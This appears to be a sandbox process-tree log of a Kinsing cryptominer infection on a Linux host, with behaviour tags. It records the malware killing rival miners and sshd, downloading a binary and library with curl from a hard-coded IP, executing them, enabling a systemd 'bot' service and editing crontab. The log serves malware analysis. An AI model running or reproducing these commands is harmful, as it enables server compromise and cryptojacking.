/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1428
-
-
/bin/grepgrep exe2⤵PID:1431
-
-
/bin/lsls -latrh /proc/zoneinfo2⤵PID:1430
-
-
/bin/grepgrep -q "/var/lib/postgresql/data/pоstgres\\|atlas.x86\\|dotsh\\|/tmp/systemd-private-\\|bin/sysinit\\|.bin/xorg\\|nine.x86\\|data/pg_mem\\|/var/lib/postgresql/data/.*/memory\\|/var/tmp/.bin/systemd\\|balder\\|sys/systemd\\|rtw88_pcied\\|.bin/x\\|httpd_watchdog\\|/var/Sofia\\|3caec218-ce42-42da-8f58-970b22d131e9\\|/tmp/watchdog\\|cpu_hu\\|/tmp/Manager\\|/tmp/manh\\|/tmp/agettyd\\|/var/tmp/java\\|/var/lib/postgresql/data/pоstmaster\\|/memfd\\|/var/lib/postgresql/data/pgdata/pоstmaster\\|/tmp/.metabase/metabasew"2⤵PID:1433
-
-
/usr/bin/idid -u2⤵PID:1434
-
-
/usr/bin/sudosudo mkdir /etc/data2⤵
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
PID:1435 -
/usr/sbin/sendmailsendmail -t3⤵PID:1438
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmMv1-0000NC-V44⤵
- Reads CPU attributes
PID:1452
-
-
-
/usr/sbin/sendmailsendmail -t3⤵PID:1441
-
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1tmMv1-0000NF-Vb4⤵
- Reads CPU attributes
PID:1451
-
-
-
/bin/mkdirmkdir /etc/data3⤵PID:1442
-
-
-
/usr/bin/idid -u2⤵PID:1443
-
-
/bin/unameuname -i2⤵
- Attempts to change immutable files
PID:1444
-
-
/bin/unameuname -m2⤵PID:1445
-
-
/bin/grepgrep -v grep2⤵PID:1449
-
-
/bin/lsls -la /etc/data2⤵PID:1447
-
-
/bin/grepgrep -e /dev2⤵PID:1448
-
-
/usr/bin/pkillpkill -f sshd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1450
-
-
/usr/bin/pkillpkill -f htop2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1453
-
-
/usr/bin/pkillpkill -f linuxsys2⤵
- Reads CPU attributes
PID:1455
-
-
/usr/bin/pkillpkill -f kthreaddo2⤵
- Reads CPU attributes
PID:1456
-
-
/usr/bin/pkillpkill -f donkey2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1457
-
-
/usr/bin/pkillpkill -f sysupdater2⤵PID:1458
-
-
/usr/bin/pkillpkill -f php-update.service2⤵
- Reads CPU attributes
PID:1459
-
-
/usr/bin/pkillpkill -f update-setup2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1462
-
-
/bin/grepgrep -v -2⤵PID:1467
-
-
/bin/grepgrep :14142⤵PID:1464
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1468
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1466
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1465
-
-
/bin/grepgrep -v grep2⤵PID:1471
-
-
/bin/grepgrep rtw88_pcied2⤵PID:1470
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1472
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1473
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1469
-
-
/bin/grepgrep -v grep2⤵PID:1476
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1478
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1474
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1477
-
-
/bin/grepgrep stratum2⤵PID:1475
-
-
/bin/grepgrep -v grep2⤵PID:1481
-
-
/bin/grepgrep Sofia2⤵PID:1480
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1482
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1479
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1483
-
-
/usr/bin/pkillpkill -f Sofia2⤵
- Reads CPU attributes
PID:1484
-
-
/bin/grepgrep -v grep2⤵PID:1487
-
-
/bin/grepgrep tracepath2⤵PID:1486
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1488
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1489
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1485
-
-
/bin/grepgrep -v grep2⤵PID:1492
-
-
/bin/grepgrep /dot2⤵PID:1491
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1493
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1494
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1490
-
-
/bin/grepgrep -v grep2⤵PID:1497
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1498
-
-
/bin/grepgrep "php-fpm pool www"2⤵PID:1496
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1499
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1495
-
-
/bin/grepgrep -v grep2⤵PID:1502
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1503
-
-
/bin/grepgrep "Cli start accept"2⤵PID:1501
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1504
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1500
-
-
/bin/grepgrep -v grep2⤵PID:1507
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1508
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1509
-
-
/bin/grepgrep "bash -k"2⤵PID:1506
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1505
-
-
/bin/grepgrep -v grep2⤵PID:1512
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1513
-
-
/bin/grepgrep perfctl2⤵PID:1511
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1514
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1510
-
-
/usr/bin/pkillpkill -f hezb2⤵
- Reads CPU attributes
PID:1515
-
-
/usr/bin/pkillpkill -f /tmp/.out2⤵
- Reads CPU attributes
PID:1516
-
-
/bin/grepgrep -v grep2⤵PID:1519
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1520
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1521
-
-
/bin/grepgrep ./ll12⤵PID:1518
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1517
-
-
/bin/grepgrep agetty2⤵PID:1523
-
-
/bin/grepgrep -v grep2⤵PID:1524
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1522
-
-
/usr/bin/awkawk "{if(\$3>80.0) print \$2}"2⤵PID:1525
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1526
-
-
/usr/bin/pkillpkill -f 42.112.28.2162⤵
- Reads CPU attributes
PID:1527
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1530
-
-
/bin/grepgrep 207.38.87.62⤵PID:1529
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1531
-
-
/bin/grepgrep -v -2⤵PID:1532
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1533
-
-
/bin/grepgrep 23.94.214.1192⤵PID:1535
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1537
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1536
-
-
/bin/grepgrep -v -2⤵PID:1538
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1539
-
-
/bin/grepgrep 127.0.0.1:520182⤵PID:1541
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1543
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1542
-
-
/bin/grepgrep -v -2⤵PID:1544
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1545
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1549
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1548
-
-
/bin/grepgrep 34.81.218.76:94862⤵PID:1547
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1551
-
-
/bin/grepgrep -v -2⤵PID:1550
-
-
/bin/grepgrep 42.112.28.216:94862⤵PID:1553
-
-
/usr/bin/awkawk "{print \$7}"2⤵PID:1554
-
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵PID:1555
-
-
/bin/grepgrep -v -2⤵PID:1556
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1557
-
-
/usr/bin/pkillpkill -f .git/kthreaddw2⤵
- Reads CPU attributes
PID:1558
-
-
/usr/bin/pkillpkill -f 80.211.206.1052⤵
- Reads CPU attributes
- Reads runtime system information
PID:1559
-
-
/usr/bin/pkillpkill -f 207.38.87.62⤵
- Reads CPU attributes
PID:1560
-
-
/usr/bin/pkillpkill -f p84442⤵
- Reads CPU attributes
- Reads runtime system information
PID:1561
-
-
/usr/bin/pkillpkill -f supportxmr2⤵
- Reads CPU attributes
PID:1562
-
-
/usr/bin/pkillpkill -f monero2⤵
- Reads CPU attributes
PID:1563
-
-
/usr/bin/pkillpkill -f kthreaddi2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1564
-
-
/usr/bin/pkillpkill -f srv002⤵
- Reads CPU attributes
PID:1565
-
-
/usr/bin/pkillpkill -f /tmp/.javae/javae2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1566
-
-
/usr/bin/pkillpkill -f .javae2⤵
- Reads CPU attributes
PID:1567
-
-
/usr/bin/pkillpkill -f .syna2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1568
-
-
/usr/bin/pkillpkill -f xmm2⤵
- Reads CPU attributes
PID:1569
-
-
/usr/bin/pkillpkill -f solr.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1570
-
-
/usr/bin/pkillpkill -f /tmp/.solr/solrd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1571
-
-
/usr/bin/pkillpkill -f /tmp/javac2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1572
-
-
/usr/bin/pkillpkill -f /tmp/.go.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1573
-
-
/usr/bin/pkillpkill -f /tmp/.x/agetty2⤵
- Reads runtime system information
PID:1574
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
PID:1575
-
-
/usr/bin/pkillpkill -f c3pool2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1576
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/gitag-ssh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1577
-
-
/usr/bin/pkillpkill -f /tmp/12⤵
- Reads CPU attributes
PID:1578
-
-
/usr/bin/pkillpkill -f /tmp/okk.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1579
-
-
/usr/bin/pkillpkill -f /tmp/gitaly2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1580
-
-
/usr/bin/pkillpkill -f /tmp/.x/kworker2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1581
-
-
/usr/bin/pkillpkill -f 43a6eY5zPm3UFCaygfsukfP94ZTHz6a1kZh5sm1aZFB2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1582
-
-
/usr/bin/pkillpkill -f /tmp/.X11-unix/supervise2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1583
-
-
/usr/bin/pkillpkill -f /tmp/.ssh/redis.sh2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1584
-
-
/bin/grepgrep -v grep2⤵PID:1587
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1588
-
-
/bin/grepgrep ./udp2⤵PID:1586
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1589
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
PID:1585
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/012⤵
- Attempts to change immutable files
PID:1590
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1592
-
-
/bin/catcat /tmp/.X11-unix/012⤵PID:1591
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/112⤵
- Attempts to change immutable files
PID:1593
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1595
-
-
/bin/catcat /tmp/.X11-unix/112⤵PID:1594
-
-
/bin/sedsed -i "s/^0//" /tmp/.X11-unix/222⤵
- Attempts to change immutable files
PID:1596
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1598
-
-
/bin/catcat /tmp/.X11-unix/222⤵PID:1597
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.12⤵
- Attempts to change immutable files
PID:1599
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1601
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1600
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.22⤵
- Attempts to change immutable files
PID:1602
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1604
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1603
-
-
/bin/sedsed -i "s/^0//" /tmp/.systemd.32⤵
- Attempts to change immutable files
PID:1605
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1607
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1606
-
-
/bin/catcat /tmp/.systemd.12⤵PID:1608
-
-
/bin/catcat /tmp/.systemd.22⤵PID:1609
-
-
/bin/catcat /tmp/.systemd.32⤵PID:1610
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.02⤵
- Attempts to change immutable files
PID:1611
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1613
-
-
/bin/catcat /tmp/.pg_stat.02⤵PID:1612
-
-
/bin/sedsed -i "s/^0//" /tmp/.pg_stat.12⤵
- Attempts to change immutable files
PID:1614
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1616
-
-
/bin/catcat /tmp/.pg_stat.12⤵PID:1615
-
-
/bin/sedsed -i "s/^0//" /data/./oka.pid2⤵
- Attempts to change immutable files
PID:1617
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1619
-
-
/bin/catcat /data/./oka.pid2⤵PID:1618
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/d2⤵
- Attempts to change immutable files
PID:1620
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1622
-
-
/bin/catcat /tmp/.ICE-unix/d2⤵PID:1621
-
-
/bin/sedsed -i "s/^0//" /tmp/.ICE-unix/m2⤵
- Attempts to change immutable files
PID:1623
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1625
-
-
/bin/catcat /tmp/.ICE-unix/m2⤵PID:1624
-
-
/usr/bin/pkillpkill -f zsvc2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1626
-
-
/usr/bin/pkillpkill -f pdefenderd2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1627
-
-
/usr/bin/pkillpkill -f updatecheckerd2⤵
- Reads CPU attributes
PID:1628
-
-
/usr/bin/pkillpkill -f cruner2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1629
-
-
/usr/bin/pkillpkill -f dbused2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1630
-
-
/usr/bin/pkillpkill -f bashirc2⤵
- Reads CPU attributes
PID:1631
-
-
/usr/bin/pkillpkill -f meminitsrv2⤵
- Reads CPU attributes
PID:1632
-
-
/bin/grepgrep -v grep2⤵PID:1635
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1636
-
-
/bin/grepgrep ./oka2⤵PID:1634
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1637
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1633
-
-
/bin/grepgrep -v grep2⤵PID:1640
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1641
-
-
/bin/grepgrep "postgres: autovacum"2⤵PID:1639
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1642
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1638
-
-
/bin/grepgrep -v bin2⤵PID:1645
-
-
/usr/bin/awkawk "length(\$1) == 8"2⤵PID:1644
-
-
/bin/grepgrep -v "\\["2⤵PID:1646
-
-
/bin/grepgrep -v "("2⤵PID:1647
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1643
-
-
/bin/grepgrep -v php-fpm2⤵PID:1648
-
-
/bin/grepgrep -v proxymap2⤵PID:1649
-
-
/bin/grepgrep -v postgres2⤵PID:1650
-
-
/bin/grepgrep -v postgrey2⤵PID:1651
-
-
/bin/grepgrep -v kinsing2⤵PID:1652
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1653
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1654
-
-
/bin/grepgrep -v bin2⤵PID:1657
-
-
/usr/bin/awkawk "length(\$1) == 16"2⤵PID:1656
-
-
/bin/grepgrep -v "\\["2⤵PID:1658
-
-
/bin/grepgrep -v "("2⤵PID:1659
-
-
/bin/psps ax -o "command,pid" -www2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1655
-
-
/bin/grepgrep -v php-fpm2⤵PID:1660
-
-
/bin/grepgrep -v proxymap2⤵PID:1661
-
-
/bin/grepgrep -v postgres2⤵PID:1662
-
-
/bin/grepgrep -v postgrey2⤵PID:1663
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1664
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1665
-
-
/bin/grepgrep -v bin2⤵PID:1668
-
-
/usr/bin/awkawk "length(\$5) == 8"2⤵PID:1667
-
-
/bin/grepgrep -v "\\["2⤵PID:1669
-
-
/bin/grepgrep -v "("2⤵PID:1670
-
-
/bin/psps ax2⤵
- Reads CPU attributes
- Reads runtime system information
PID:1666
-
-
/bin/grepgrep -v php-fpm2⤵PID:1671
-
-
/bin/grepgrep -v proxymap2⤵PID:1672
-
-
/bin/grepgrep -v postgres2⤵PID:1673
-
-
/bin/grepgrep -v postgrey2⤵PID:1674
-
-
/usr/bin/awkawk "{print \$1}"2⤵PID:1675
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1676
-
-
/bin/grepgrep -v grep2⤵PID:1678
-
-
/bin/grepgrep /tmp/sscks2⤵PID:1679
-
-
/usr/bin/awkawk "{print \$2}"2⤵PID:1680
-
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
PID:1681
-
-
/bin/psps aux2⤵
- Reads CPU attributes
- Process Discovery
- Reads runtime system information
PID:1677
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1685
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1684
-
-
/bin/rmrm -rf /etc/data/kinsing2⤵PID:1686
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1687
-
-
/usr/bin/curlcurl -o /etc/data/kinsing http://194.38.22.120/kinsing2⤵PID:1688
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1689
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1693
-
-
/usr/bin/md5summd5sum /etc/data/kinsing2⤵PID:1692
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1697
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1696
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1698
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1699
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1700
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1703
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1704
-
-
/bin/chmodchmod 777 /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1705
-
-
/usr/bin/curlcurl -o /etc/data/libsystem.so http://194.38.22.120/libsystem.so2⤵PID:1706
-
-
/bin/chmodchmod +x /etc/data/libsystem.so2⤵
- File and Directory Permissions Modification
PID:1707
-
-
/usr/bin/md5summd5sum /etc/data/libsystem.so2⤵PID:1710
-
-
/usr/bin/awkawk "{ print \$1 }"2⤵PID:1711
-
-
/bin/rmrm -rf /tmp/kdevtmpfsi2⤵PID:1712
-
-
/bin/chmodchmod 777 /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1713
-
-
/bin/chmodchmod +x /etc/data/kinsing2⤵
- File and Directory Permissions Modification
PID:1714
-
-
/etc/data/kinsing/etc/data/kinsing2⤵PID:1715
-
-
/usr/bin/idid -u2⤵PID:1717
-
-
/bin/systemctlsystemctl enable bot2⤵
- Enumerates kernel/hardware configuration
PID:1718
-
-
/bin/systemctlsystemctl start bot2⤵
- Enumerates kernel/hardware configuration
PID:1731
-
-
/bin/sedsed /base64/d2⤵PID:1736
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1737
-
-
/usr/bin/crontabcrontab -l2⤵PID:1735
-
-
/bin/sedsed /_cron/d2⤵PID:1739
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1740
-
-
/usr/bin/crontabcrontab -l2⤵PID:1738
-
-
/bin/sedsed /31.210.20.181/d2⤵PID:1742
-
-
/usr/bin/crontabcrontab -l2⤵PID:1741
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1743
-
-
/bin/sedsed /update.sh/d2⤵PID:1745
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1746
-
-
/usr/bin/crontabcrontab -l2⤵PID:1744
-
-
/bin/sedsed /logo4/d2⤵PID:1748
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1749
-
-
/usr/bin/crontabcrontab -l2⤵PID:1747
-
-
/bin/sedsed /logo9/d2⤵PID:1751
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1752
-
-
/usr/bin/crontabcrontab -l2⤵PID:1750
-
-
/bin/sedsed /logo0/d2⤵PID:1754
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1755
-
-
/usr/bin/crontabcrontab -l2⤵PID:1753
-
-
/bin/sedsed /logo/d2⤵PID:1757
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1758
-
-
/usr/bin/crontabcrontab -l2⤵PID:1756
-
-
/bin/sedsed /tor2web/d2⤵PID:1760
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1761
-
-
/usr/bin/crontabcrontab -l2⤵PID:1759
-
-
/bin/sedsed /jpg/d2⤵PID:1763
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1764
-
-
/usr/bin/crontabcrontab -l2⤵PID:1762
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1767
-
-
/bin/sedsed /png/d2⤵PID:1766
-
-
/usr/bin/crontabcrontab -l2⤵PID:1765
-
-
/bin/sedsed /tmp/d2⤵PID:1769
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1770
-
-
/usr/bin/crontabcrontab -l2⤵PID:1768
-
-
/bin/sedsed /zmreplchkr/d2⤵PID:1772
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1773
-
-
/usr/bin/crontabcrontab -l2⤵PID:1771
-
-
/bin/sedsed /aliyun.one/d2⤵PID:1775
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1776
-
-
/usr/bin/crontabcrontab -l2⤵
- Reads runtime system information
PID:1774
-
-
/bin/sedsed /3.215.110.66.one/d2⤵PID:1778
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1779
-
-
/usr/bin/crontabcrontab -l2⤵PID:1777
-
-
/bin/sedsed /pastebin/d2⤵PID:1781
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1782
-
-
/usr/bin/crontabcrontab -l2⤵PID:1780
-
-
/bin/sedsed /onion/d2⤵PID:1784
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1785
-
-
/usr/bin/crontabcrontab -l2⤵PID:1783
-
-
/bin/sedsed /lsd.systemten.org/d2⤵PID:1787
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1788
-
-
/usr/bin/crontabcrontab -l2⤵PID:1786
-
-
/bin/sedsed /shuf/d2⤵PID:1790
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1791
-
-
/usr/bin/crontabcrontab -l2⤵PID:1789
-
-
/bin/sedsed /ash/d2⤵PID:1793
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1794
-
-
/usr/bin/crontabcrontab -l2⤵PID:1792
-
-
/bin/sedsed /mr.sh/d2⤵PID:1796
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1797
-
-
/usr/bin/crontabcrontab -l2⤵PID:1795
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1799
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1800
-
-
/usr/bin/crontabcrontab -l2⤵PID:1798
-
-
/bin/sedsed /localhost.xyz/d2⤵PID:1805
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1806
-
-
/usr/bin/crontabcrontab -l2⤵PID:1804
-
-
/bin/sedsed /45.137.151.106/d2⤵PID:1808
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1809
-
-
/usr/bin/crontabcrontab -l2⤵PID:1807
-
-
/bin/sedsed /111.90.159.106/d2⤵PID:1811
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1812
-
-
/usr/bin/crontabcrontab -l2⤵PID:1810
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1815
-
-
/bin/sedsed /github/d2⤵PID:1814
-
-
/usr/bin/crontabcrontab -l2⤵PID:1813
-
-
/bin/sedsed /bigd1ck.com/d2⤵PID:1817
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1818
-
-
/usr/bin/crontabcrontab -l2⤵PID:1816
-
-
/bin/sedsed /xmr.ipzse.com/d2⤵
- System Network Configuration Discovery
PID:1820
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1821
-
-
/usr/bin/crontabcrontab -l2⤵PID:1819
-
-
/bin/sedsed /185.181.10.234/d2⤵PID:1823
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1824
-
-
/usr/bin/crontabcrontab -l2⤵PID:1822
-
-
/bin/sedsed /91.241.19.134/d2⤵PID:1826
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1827
-
-
/usr/bin/crontabcrontab -l2⤵PID:1825
-
-
/bin/sedsed /122.51.164.83/d2⤵PID:1829
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1830
-
-
/usr/bin/crontabcrontab -l2⤵PID:1828
-
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1833
-
-
/bin/sedsed /185.191.32.198/d2⤵PID:1832
-
-
